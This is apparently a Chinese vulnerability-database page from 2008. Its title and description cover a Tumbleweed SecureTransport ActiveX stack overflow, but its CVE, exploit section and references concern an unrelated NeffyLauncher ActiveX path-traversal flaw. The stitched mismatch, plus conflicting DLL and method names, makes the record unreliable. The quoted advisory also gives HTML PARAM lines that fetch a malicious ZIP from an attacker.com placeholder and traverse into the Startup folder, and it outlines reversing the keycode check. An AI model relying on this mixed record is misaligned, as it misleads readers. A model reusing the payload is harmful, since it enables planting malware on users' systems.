Tumbleweed SecureTransport vcst_eu.dll ActiveX控件远程栈溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1114947 漏洞类型 路径遍历
发布时间 2008-04-07 更新时间 2008-11-05
CVE编号 CVE-2008-1885 CNNVD-ID CNNVD-200804-300
漏洞平台 Windows CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/5397
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200804-300
|漏洞详情
TumbleweedSecureTransport是安全的文件传输解决方案,允许用户通过Internet传输敏感文件。SecureTransport的FileTransferActiveX控件(vcst_en.dll,CLSID:38681fbd-d4cc-4a59-a527-b3136db711d3)中存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞控制用户系统。相关代码:interfaceIActiveXTransfer:IDispatch{[id(0x00000007),helpstring("methodTransferFile")]HRESULTTransferFile([in]VARIANTURL,[in]VARIANThostName,[in]VARIANTlocalFile,[in]VARIANTremoteFile,[in]VARIANTfdxCookie,[in]longisSecure,[in]longisUpload,[in]intportNo,[in]longisAscii,[in]longshouldPerformMD5,[in]longisCheckpointRestart,[in]intserverPing,[out,retval]VARIANT*errBuffer);};如果对IActiveXTransfer.FileTransfer()方式的remoteFile参数指定了很大的值的话,就可以触发栈溢出,导致执行任意代码。其他参数,如localFile、fdxCookie和localFile等,也可能存在类似的漏洞。
|漏洞EXP
Title: CDNetworks Nefficient Download(NeffyLauncher.dll) Vulnerabilities
Author: Simon Ryeo(bar4mi (at) gmail.com, barami (at) ahnlab.com)
Severity: High
Impact: Remote Code Execution
Vulnerable Systems: MS Windows Systems
Version: NeffyLauncher 1.0.5 {AA07EBD2-EBDD-4BD6-9F8F-114BD513492C}
Solution: Upgrade the vendor's patch
Vendor's Homepage: http://www.cdnetworks.com
Reference: How to stop an ActiveX control from running in Internet Explorer
          http://support.microsoft.com/kb/240797/ko
          http://support.microsoft.com/kb/240797/en-us
History:
  - 02.27.2008: Initiate notify
  - 03.06.2008: The vendor patched
  - After: The vendor are applying the patch to their customers.

Description:
Neffycient Download is a ActiveX control used to download and to upgrade
such as game install files through HTTP, FTP, etc. It has two
vulnerabilities.
1st, a attacker can copy a malicious file to any path such as start program
folder(C:\Documents and Settings\All Users\Start Menu\Programs\Startup).
2nd, a attacker can issue keycodes which are used to restrict execution on
other domains.

Object:
I notify this vulnerability not to promote abnormal uses but to make
a software more secure. This vulnerability was patched by the vendor's
positive effort. I hope this information helps many people who try
to study security and to develop an application.

1. Remote Code Execution
First of all, we must have write permission on a board in a web site used
this ActiveX or obtain a valid keycode which is correct to your site.
An Attacker who has a valid keycode can make a expolit by modifying
HttpSkin,
SkinPath's values. Malicious files which is on attacker's site must
be compressed as ZIP file.
For instance. The below modification copies abnormal files to Windows's
root directory.
<PARAM NAME="HttpSkin" VALUE="http://www.attacker.com/maliciousFiles.zip">
<PARAM NAME="SkinPath" VALUE="../../../../">

In this way an attacker can modify SkinPath's value to All Users's Start
Program Folder. Then he can execute his malicious program when the user
restarts his computer.

2. Generating a KeyCode Value
An attacker can make the keycode generator by debugging this ActiveX
control. A keycode's value has two meaning. First two digits represent
the domain's length(hexadecimal).
Next five(or more) digits are valuable numbers to calculate a domain.
The keycode check the procedure of this ActiveX control likes below.
It calculates the keycode's value and returns four bytes as a result.
Next it starts the domain's calculation and returns four bytes.
Finally, it compares with these four bytes to check whether the site is
valid.
I made a PoC using inline assembly and C. But it doesn't open to the public
because of the vendor's request. (Just refer above descriptions.)

# milw0rm.com [2008-04-07]
|参考资料

来源:XF
名称:nefficientdload-neffylauncher-dir-traversal(41743)
链接:http://xforce.iss.net/xforce/xfdb/41743
来源:BID
名称:28666
链接:http://www.securityfocus.com/bid/28666
来源:MILW0RM
名称:5397
链接:http://www.milw0rm.com/exploits/5397
来源:VUPEN
名称:ADV-2008-1186
链接:http://www.frsirt.com/english/advisories/2008/1186
来源:SECUNIA
名称:29692
链接:http://secunia.com/advisories/29692
来源:BUGTRAQ
名称:20080407CDNetworksNefficientDownload(NeffyLauncher.dll)Vulnerabilities
链接:http://seclists.org/bugtraq/2008/Apr/0065.html